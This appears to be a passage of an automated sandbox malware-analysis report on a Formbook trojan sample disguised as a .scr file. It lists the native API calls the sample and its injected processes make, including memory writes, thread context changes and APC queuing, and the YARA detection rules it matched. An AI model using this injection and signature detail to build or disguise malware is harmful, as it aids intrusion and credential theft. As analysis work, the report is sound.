      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FA50 NtEnumerateValueKey,11_2_0091FA50
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FBE8 NtQueryVirtualMemory,11_2_0091FBE8
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FB50 NtCreateKey,11_2_0091FB50
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC30 NtOpenProcess,11_2_0091FC30
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FC48 NtSetInformationFile,11_2_0091FC48
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00921D80 NtSuspendThread,11_2_00921D80
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FD5C NtEnumerateKey,11_2_0091FD5C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FE24 NtWriteVirtualMemory,11_2_0091FE24
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FFFC NtCreateProcessEx,11_2_0091FFFC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0091FF34 NtQueueApcThread,11_2_0091FF34
      Source: C:\Windows\explorer.exeCode function: 13_2_08D63E12 NtProtectVirtualMemory,13_2_08D63E12
      Source: C:\Windows\explorer.exeCode function: 13_2_08D62232 NtCreateFile,13_2_08D62232
      Source: C:\Windows\explorer.exeCode function: 13_2_08D63E0A NtProtectVirtualMemory,13_2_08D63E0A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10096 CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,14_2_00C10096
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FCA0 memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FCA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10276 memcpy,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C10276
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FDE4 memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FDE4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FBAF CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FBAF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C1014C CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C1014C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C0FF3F memset,memcpy,CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,RtlNtStatusToDosError,14_2_00C0FF3F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020400C4 NtCreateFile,LdrInitializeThunk,14_2_020400C4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020407AC NtCreateMutant,LdrInitializeThunk,14_2_020407AC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAB8 NtQueryValueKey,LdrInitializeThunk,14_2_0203FAB8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,14_2_0203FAD0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FAE8 NtQueryInformationProcess,LdrInitializeThunk,14_2_0203FAE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FB50 NtCreateKey,LdrInitializeThunk,14_2_0203FB50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FB68 NtFreeVirtualMemory,LdrInitializeThunk,14_2_0203FB68
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FBB8 NtQueryInformationToken,LdrInitializeThunk,14_2_0203FBB8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F900 NtReadFile,LdrInitializeThunk,14_2_0203F900
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F9F0 NtClose,LdrInitializeThunk,14_2_0203F9F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,14_2_0203FED0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FFB4 NtCreateSection,LdrInitializeThunk,14_2_0203FFB4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC60 NtMapViewOfSection,LdrInitializeThunk,14_2_0203FC60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FD8C NtDelayExecution,LdrInitializeThunk,14_2_0203FD8C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FDC0 NtQuerySystemInformation,LdrInitializeThunk,14_2_0203FDC0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040048 NtProtectVirtualMemory,14_2_02040048
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040060 NtQuerySection,14_2_02040060
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040078 NtResumeThread,14_2_02040078
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020410D0 NtOpenProcessToken,14_2_020410D0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204010C NtOpenDirectoryObject,14_2_0204010C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041148 NtOpenThread,14_2_02041148
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020401D4 NtSetValueKey,14_2_020401D4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FA20 NtQueryInformationFile,14_2_0203FA20
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FA50 NtEnumerateValueKey,14_2_0203FA50
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FBE8 NtQueryVirtualMemory,14_2_0203FBE8
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F8CC NtWaitForSingleObject,14_2_0203F8CC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041930 NtSetContextThread,14_2_02041930
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203F938 NtWriteFile,14_2_0203F938
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FE24 NtWriteVirtualMemory,14_2_0203FE24
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FEA0 NtReadVirtualMemory,14_2_0203FEA0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FF34 NtQueueApcThread,14_2_0203FF34
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FFFC NtCreateProcessEx,14_2_0203FFFC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC30 NtOpenProcess,14_2_0203FC30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02040C40 NtGetContextThread,14_2_02040C40
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC48 NtSetInformationFile,14_2_0203FC48
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FC90 NtUnmapViewOfSection,14_2_0203FC90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0203FD5C NtEnumerateKey,14_2_0203FD5C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02041D80 NtSuspendThread,14_2_02041D80
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A340 NtCreateFile,14_2_0009A340
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A3F0 NtReadFile,14_2_0009A3F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A470 NtClose,14_2_0009A470
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A520 NtAllocateVirtualMemory,14_2_0009A520
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A392 NtCreateFile,NtReadFile,14_2_0009A392
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A3EA NtReadFile,14_2_0009A3EA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009A43A NtReadFile,14_2_0009A43A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4A036 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,14_2_00A4A036
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A49BAF NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtUnmapViewOfSection,NtClose,14_2_00A49BAF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4A042 NtQueryInformationProcess,14_2_00A4A042
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A49BB2 NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,14_2_00A49BB2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00C10096: CreateEventW,NtDeviceIoControlFile,NtWaitForSingleObject,CloseHandle,RtlNtStatusToDosError,SetLastError,GetLastError,14_2_00C10096
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 10_2_002442DA10_2_002442DA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092E0C611_2_0092E0C6
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092E2E911_2_0092E2E9
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D63BF11_2_009D63BF
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009563DB11_2_009563DB
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093230511_2_00932305
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0097A37B11_2_0097A37B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B443E11_2_009B443E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0094C5F011_2_0094C5F0
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B05E311_2_009B05E3
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0097654011_2_00976540
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093468011_2_00934680
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093E6C111_2_0093E6C1
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0097A63411_2_0097A634
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D262211_2_009D2622
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093C7BC11_2_0093C7BC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093C85C11_2_0093C85C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0095286D11_2_0095286D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D098E11_2_009D098E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009329B211_2_009329B2
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009C49F511_2_009C49F5
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009469FE11_2_009469FE
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0097C92011_2_0097C920
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009DCBA411_2_009DCBA4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B6BCB11_2_009B6BCB
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D2C9C11_2_009D2C9C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009BAC5E11_2_009BAC5E
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00960D3B11_2_00960D3B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093CD5B11_2_0093CD5B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00962E2F11_2_00962E2F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0094EE4C11_2_0094EE4C
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009CCFB111_2_009CCFB1
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009A2FDC11_2_009A2FDC
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00940F3F11_2_00940F3F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0095D00511_2_0095D005
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0094905A11_2_0094905A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093304011_2_00933040
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009AD06D11_2_009AD06D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009BD13F11_2_009BD13F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D123811_2_009D1238
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092F3CF11_2_0092F3CF
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093735311_2_00937353
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0096548511_2_00965485
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0094148911_2_00941489
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0096D47D11_2_0096D47D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009D35DA11_2_009D35DA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0093351F11_2_0093351F
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B579A11_2_009B579A
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009657C311_2_009657C3
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009C771D11_2_009C771D
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009AF8C411_2_009AF8C4
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009CF8EE11_2_009CF8EE
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B595511_2_009B5955
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009B394B11_2_009B394B
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009E3A8311_2_009E3A83
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009BDBDA11_2_009BDBDA
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0092FBD711_2_0092FBD7
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_00957B0011_2_00957B00
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009CFDDD11_2_009CFDDD
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_009BBF1411_2_009BBF14
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: 11_2_0095DF7C11_2_0095DF7C
      Source: C:\Windows\explorer.exeCode function: 13_2_081ED03613_2_081ED036
      Source: C:\Windows\explorer.exeCode function: 13_2_081E408213_2_081E4082
      Source: C:\Windows\explorer.exeCode function: 13_2_081EB91213_2_081EB912
      Source: C:\Windows\explorer.exeCode function: 13_2_081E5D0213_2_081E5D02
      Source: C:\Windows\explorer.exeCode function: 13_2_081F15CD13_2_081F15CD
      Source: C:\Windows\explorer.exeCode function: 13_2_081EE23213_2_081EE232
      Source: C:\Windows\explorer.exeCode function: 13_2_081E8B3213_2_081E8B32
      Source: C:\Windows\explorer.exeCode function: 13_2_081E8B3013_2_081E8B30
      Source: C:\Windows\explorer.exeCode function: 13_2_08D6223213_2_08D62232
      Source: C:\Windows\explorer.exeCode function: 13_2_08D5808213_2_08D58082
      Source: C:\Windows\explorer.exeCode function: 13_2_08D6103613_2_08D61036
      Source: C:\Windows\explorer.exeCode function: 13_2_08D655CD13_2_08D655CD
      Source: C:\Windows\explorer.exeCode function: 13_2_08D5F91213_2_08D5F912
      Source: C:\Windows\explorer.exeCode function: 13_2_08D59D0213_2_08D59D02
      Source: C:\Windows\explorer.exeCode function: 13_2_08D5CB3013_2_08D5CB30
      Source: C:\Windows\explorer.exeCode function: 13_2_08D5CB3213_2_08D5CB32
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020F123814_2_020F1238
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204E2E914_2_0204E2E9
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205230514_2_02052305
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205735314_2_02057353
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0209A37B14_2_0209A37B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020F63BF14_2_020F63BF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204F3CF14_2_0204F3CF
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020763DB14_2_020763DB
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0207D00514_2_0207D005
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205304014_2_02053040
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0206905A14_2_0206905A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204E0C614_2_0204E0C6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020F262214_2_020F2622
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0209A63414_2_0209A634
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205468014_2_02054680
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205E6C114_2_0205E6C1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020D579A14_2_020D579A
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205C7BC14_2_0205C7BC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020857C314_2_020857C3
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020D443E14_2_020D443E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0208D47D14_2_0208D47D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0208548514_2_02085485
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0206148914_2_02061489
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205351F14_2_0205351F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0209654014_2_02096540
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0206C5F014_2_0206C5F0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02103A8314_2_02103A83
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02077B0014_2_02077B00
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020FCBA414_2_020FCBA4
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0204FBD714_2_0204FBD7
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020DDBDA14_2_020DDBDA
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205C85C14_2_0205C85C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0207286D14_2_0207286D
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020EF8EE14_2_020EF8EE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020D394B14_2_020D394B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020D595514_2_020D5955
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020F098E14_2_020F098E
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020529B214_2_020529B2
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020669FE14_2_020669FE
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02082E2F14_2_02082E2F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0206EE4C14_2_0206EE4C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02060F3F14_2_02060F3F
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0207DF7C14_2_0207DF7C
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020ECFB114_2_020ECFB1
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020C2FDC14_2_020C2FDC
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_02080D3B14_2_02080D3B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0205CD5B14_2_0205CD5B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_020EFDDD14_2_020EFDDD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009D58314_2_0009D583
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00082D9014_2_00082D90
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009EDA514_2_0009EDA5
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_0009E5D614_2_0009E5D6
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00089E5B14_2_00089E5B
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00089E6014_2_00089E60
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00082FB014_2_00082FB0
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4A03614_2_00A4A036
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4108214_2_00A41082
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4E5CD14_2_00A4E5CD
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A42D0214_2_00A42D02
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4891214_2_00A48912
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A4B23214_2_00A4B232
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A45B3014_2_00A45B30
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: 14_2_00A45B3214_2_00A45B32
      Source: ~WRF{ED1BAB3C-10CE-436B-BF18-52F8AAAAA7A9}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0204DF5C appears 119 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 02093F92 appears 132 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0209373B appears 244 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 020BF970 appears 84 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 00C05EBD appears 114 times
      Source: C:\Windows\SysWOW64\wlanext.exeCode function: String function: 0204E2A8 appears 38 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: String function: 0099F970 appears 84 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: String function: 00973F92 appears 132 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: String function: 0097373B appears 253 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: String function: 0092E2A8 appears 60 times
      Source: C:\Users\user\AppData\Roaming\nelb82019.scrCode function: String function: 0092DF5C appears 137 times
      Source: 10.2.nelb82019.scr.860000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.32a5770.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.2296f6c.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.860000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.22997ac.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 10.2.nelb82019.scr.32a5770.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923498650.0000000000230000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
      Source: 0000000A.00000002.402124623.0000000000860000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_DLInjector02 author = ditekSHen, description = Detects downloader injector
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
      Source: 0000000E.00000002.923467871.0000000000080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
